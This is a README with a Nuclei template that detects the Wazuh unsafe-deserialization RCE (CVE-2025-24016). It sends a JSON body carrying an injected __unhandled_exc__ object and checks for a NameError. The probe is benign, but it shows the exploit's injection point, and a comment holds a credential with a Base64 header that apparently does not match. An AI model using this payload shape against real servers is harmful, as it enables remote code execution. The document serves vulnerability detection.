# CVE-2025-24016 Wazuh Unsafe Deserialization RCE Detection
This repository contains a Nuclei template to detect the unsafe deserialization vulnerability in Wazuh servers, identified as **CVE-2025-24016**.
## Template Details
```yaml
id: wazuh-unsafe-deserialization
info:
name: "Wazuh Unsafe Deserialization RCE Detection"
author: "Hüseyin TINTAŞ"
severity: critical
description: |
This template detects an unsafe deserialization vulnerability in Wazuh servers.
The DistributedAPI deserializes JSON data using as_wazuh_object. If an attacker injects
a malicious object (via __unhandled_exc__), arbitrary Python code execution can be achieved.
Instead of triggering a shutdown (e.g. via exit), this template uses a non-existent class
("NotARealClass") to generate a NameError. A NameError in the response indicates that the
payload reached the vulnerable deserialization function.
tags: wazuh, deserialization, rce, unsafe, cve, cve-2025-24016
reference:
- https://documentation.wazuh.com/
requests:
- method: POST
path:
- "{{BaseURL}}/security/user/authenticate/run_as"
headers:
Content-Type: application/json
# If needed, uncomment the following line for authentication (Base64 encoded "wazuh-wui:MyS3cr37P450r.*-")
# Authorization: "Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg=="
body: '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'
matchers:
- type: status
status:
- 500
- type: word
part: body
words:
- "NameError"
```
## Usage
```bash
nuclei -t CVE-2025-24016.yaml -u http://example.com
```
## Contact
For any inquiries or further information, you can reach out to me through:
- [LinkedIn](https://www.linkedin.com/in/huseyintintas/)
- [Twitter](https://twitter.com/1337stif)
[4.0K] /data/pocs/c4d655b54017657fc1205124fb7ca047d8a29c91
├── [1.3K] CVE-2025-24016.yaml
└── [1.8K] README.md
0 directories, 2 files